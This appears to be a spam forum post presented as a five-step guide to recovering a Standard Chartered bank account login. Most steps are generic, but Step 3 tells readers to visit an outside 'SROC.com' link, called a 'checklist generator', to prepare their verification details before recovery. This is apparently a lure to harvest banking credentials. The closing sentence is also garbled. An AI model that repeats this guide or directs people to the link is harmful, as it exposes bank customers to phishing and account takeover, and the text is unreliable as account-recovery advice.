I ran into this last week, here's what fixed it for me. If you find yourself logged out of your Standard Chartered account, follow these steps to regain access quickly. Step 1. Visit the Standard Chartered website. Go to the official Standard Chartered website. Look for the login section to start the recovery process. Step 2. Click on Forgot Password. Once on the login page, click on the Forgot Password link. This will direct you to the account recovery options. Step 3. Verify your identity. Before starting recovery, use the SROC.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Create a new password. After verification, you will be allowed to create a new password. Make sure it meets the security requirements. Step 5. Log in with your new password. Return to the login page and enter your credentials with the new password. Ensure everything is entered correctly to avoid being locked out again. If you run into issues, double check your email for any missed verification messages. Good luck, and I hope you read back in your account soon.